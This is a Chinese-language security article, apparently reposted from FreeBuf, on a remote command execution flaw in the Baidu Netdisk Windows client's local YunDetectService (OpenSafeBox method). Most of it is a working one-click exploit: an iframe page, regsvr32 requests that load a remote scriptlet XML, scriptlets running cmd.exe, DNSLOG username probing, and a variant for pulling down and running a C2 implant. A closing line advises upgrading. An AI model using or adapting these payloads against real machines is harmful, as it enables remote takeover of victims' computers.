百度网盘客户端YunDetectService服务 OpenSafeBox 远程命令执行漏洞
百度网盘Windows客户端存在远程命令执行漏洞,攻击者可通过构造恶意请求利用OpenSafeBox方法执行任意命令,导致系统被攻陷。该漏洞影响版本7.50.0.130及以下,并可通过诱导目标访问特定页面远程加载恶意XML文件实现攻击。建议用户升级至最新版本修复漏洞。 2025-9-5 13:41:2 Author: www.freebuf.com(查看原文) 阅读量:8 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

百度网盘Windows客户端存在远程命令执行漏洞,Windows客户端安装后,后台程序YunDetectService.exe将监听本地10000端⼝。该后台程序为开机⾃启动;10000端口用来接收web请求(版本7.50.0.130之前处理HTTP,往后版本则是HTTPS),以method=xxxx的形式传递参数,实现不同的功能。其中的method可接收的参数主要包括:GetVersion,GetPcCode,DownloadShareItems,DownloadSelfOwnItems,OpenSafeBox等。其中OpenSafeBox方法存在远程命令执行漏洞,攻击者可以利用该漏洞执行任意命令,导致系统失陷。 图片

Baidunetdisk≤7.59.5.104

查看当前版本

https://127.0.0.1:10000/?method=GetVersion

图片

1click执行系统命令

通过诱导目标访问我们制作好的页面远程加载我们构造的攻击XML造成系统命令执行

http://192.168.1.1/poc.html

图片 图片

poc.html

<html><iframewidth="1px"height="1px"referrerpolicy="no-referrer"src='https://127.0.0.1:10000/?method=OpenSafeBox&uk=a%20-install%20regdll%20%22C:\\windows\\system32\\scrobj.dll\%22%20/u%20/i:http://[payload监听地址]/poc.xml%20\%22\\..\\..\\..\\..\\..\\..\\..\\Users\[实际用户名]\AppData\Roaming\baidu\BaiduNetdisk'></ifram></html>

poc.xml

<?XML version="1.0"?><scriptlet><registrationprogid="poc"classid="{10001111-0000-0000-0000-0000FEEDACDC}"><scriptlanguage="JScript">            <![CDATA[            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c calc.exe");            ]]></script></registration></scriptlet>

查看版本

https://1.1.1.1/?method=GetVersion

图片

DNSLOG探测

通过DNSLOG探测确认可以成功远程加载恶意XML。这里[实际用户名]在实战中可以通过爆破(利用dnslog探测)得到,一般很多默认Administrator、admin等等。

https://1.1.1.1/?method=OpenSafeBox&uk=a%20-install%20regdll%20%22C:\\windows\\system32\\scrobj.dll\%22%20/u%20/i:http://[payload服务器地址]/poc.xml%20\%22\\..\\..\\..\\..\\..\\..\\..\\Users\[实际用户名]\AppData\Roaming\baidu\BaiduNetdisk

图片 图片

上线C2

通过修改XML文件中执行命令为C2文件执行命令获取系统权限。 图片 图片 图片

RCE.xml

<?XML version="1.0"?><scriptlet><registrationprogid="poc"classid="{10001111-0000-0000-0000-0000FEEDACDC}"><scriptlanguage="JScript">            <![CDATA[            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c [C2下载并执行命令]");            ]]></script></registration></scriptlet>

升级最新版本https://pan.baidu.com/

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/vuls/447511.html
如有侵权请联系:admin#unsafe.sh